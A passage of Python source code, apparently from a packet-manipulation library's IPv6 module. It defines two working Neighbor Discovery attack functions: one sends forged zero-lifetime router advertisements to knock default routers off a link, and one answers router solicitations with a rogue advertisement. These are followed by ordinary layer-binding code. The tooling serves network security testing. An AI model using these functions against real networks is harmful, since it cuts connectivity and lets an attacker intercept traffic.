3837
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    The purpose of the function is to monitor incoming RA messages
    sent by default routers (RA with a non-zero Router Lifetime value)
    and invalidate them by immediately replying with fake RA messages
    advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet source address).
    With regard to emission, the multicast all-nodes address is used
    by default but a specific target can be used, in order for the DoS to
    apply only to a specific host.

    The function hands control to sniff() and sends one fake RA for each
    matching RA it captures.

    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.
         Frames whose Ethernet source is this address are excluded from
         the capture filter.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address. Only
         the Ethernet destination changes; the IPv6 destination of the
         reply is always ff02::1.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Tell whether req is an RA we must answer: it has Ether, IPv6 and
        ICMPv6ND_RA layers, passes the optional source filters and carries
        a non-zero Router Lifetime.
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return False

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return False

        ip_src = req[IPv6].src
        if ip_src_filter and ip_src != ip_src_filter:
            return False

        # Check if this is an advertisement for a Default Router
        # by looking at Router Lifetime value
        return req[ICMPv6ND_RA].routerlifetime != 0

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that sends an RA with a 0 lifetime, reusing the IPv6
        source address, the Prefix Information options and the source
        link-layer address of the captured RA.
        """

        # Let's build a reply and send it

        src = req[IPv6].src

        # Pick the link-layer address to advertise *before* extracting the
        # PIOs: the loop below deletes the payload of each PIO found in req,
        # so an option placed after the first PIO would no longer be found
        # in req afterwards and the Ethernet source would be used instead.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

        # Add it the PIOs from the request: walk the option chain, keeping
        # a handle on what follows each PIO before cutting it off so that
        # only the option itself is appended to the reply ...
        tmp = req
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            tmp = pio.payload
            del pio.payload
            rep /= pio

        # ... and source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)
3958
3959
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Watch the link for RS messages and answer each of them with the
    provided RA message.

    The RA is sent unmodified at layer 2 through sendp(), which means it
    has to start with an Ethernet header (a packet starting with IPv6
    will not work). The function is therefore little more than sendp()
    driven by the reception of RS messages.

    Example:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    Arguments:

    ra: the RA message sent in response to every accepted RS message.

    iface: the interface (e.g. "eth0") used both for listening and for
         sending. When none is provided, conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69"). When set,
         only RS messages with this Ethernet source trigger a reply.
         The RA is never altered: to reach only the sender of the RS,
         set the Ethernet destination address of your RA to the same
         value. Default is None (no filtering on the Ethernet source).

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2). When
         set, only RS messages with this IPv6 source trigger a reply.
         As above, you will probably want a specific Ethernet
         destination address in the RA when using it. Default is None.
    """

    out_iface = iface if iface else conf.iface

    def _wanted_rs(pkt):
        """
        Accept pkt only if it is an RS passing the optional source filters
        """
        if Ether not in pkt or IPv6 not in pkt or ICMPv6ND_RS not in pkt:
            return 0
        if mac_src_filter and pkt[Ether].src != mac_src_filter:
            return 0
        if ip_src_filter and pkt[IPv6].src != ip_src_filter:
            return 0
        return 1

    def _answer_rs(pkt):
        """
        Send the RA and report which solicitor triggered it
        """
        solicitor = pkt[IPv6].src
        sendp(ra, iface=out_iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % solicitor)

    sniff(store=0,
          filter="icmp6",
          lfilter=_wanted_rs,
          prn=_answer_rs,
          iface=out_iface)
4039
4040#############################################################################
4041# Pre-load classes                                                         ##
4042#############################################################################
4043
4044
def _get_cls(name):
    """
    Return the module-level object called name, or Raw if this module
    defines no such name.
    """
    try:
        return globals()[name]
    except KeyError:
        return Raw
4047
4048
def _load_dict(d):
    """
    Replace, in place, every value of d by what _get_cls() returns for it.
    """
    for key in list(d):
        d[key] = _get_cls(d[key])
4052
4053
# Resolve the lookup tables in place: each value is looked up by name in
# this module's globals and replaced by the object found there, or by Raw
# when the module defines no such name.
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)
4057
4058#############################################################################
4059#############################################################################
4060#                            Layers binding                                 #
4061#############################################################################
4062#############################################################################
4063
# Register IPv6 (and IPv46 for the raw link types) in conf's layer-3 and
# layer-2 type tables.
conf.l3types.register(ETH_P_IPV6, IPv6)
# NOTE(review): 31 is a bare number with no named constant here; confirm
# which link type it stands for.
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
# NOTE(review): register_num2layer (not register) is used for DLT_RAW_ALT,
# presumably so that only the number -> layer direction is added; confirm.
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)

# IPv6 on top of lower layers, keyed on each layer's type/proto/code field.
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
bind_layers(Loopback, IPv6, type=socket.AF_INET6)
# TCPerror / UDPerror on top of IPerror6, keyed on its nh field.
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
# TCP / UDP on top of IPv6, keyed on its nh field.
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
# Encapsulations: IPv6 on top of IP, IPv6 on top of IPv6, IP on top of
# IPv6 and GRE on top of IPv6.
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)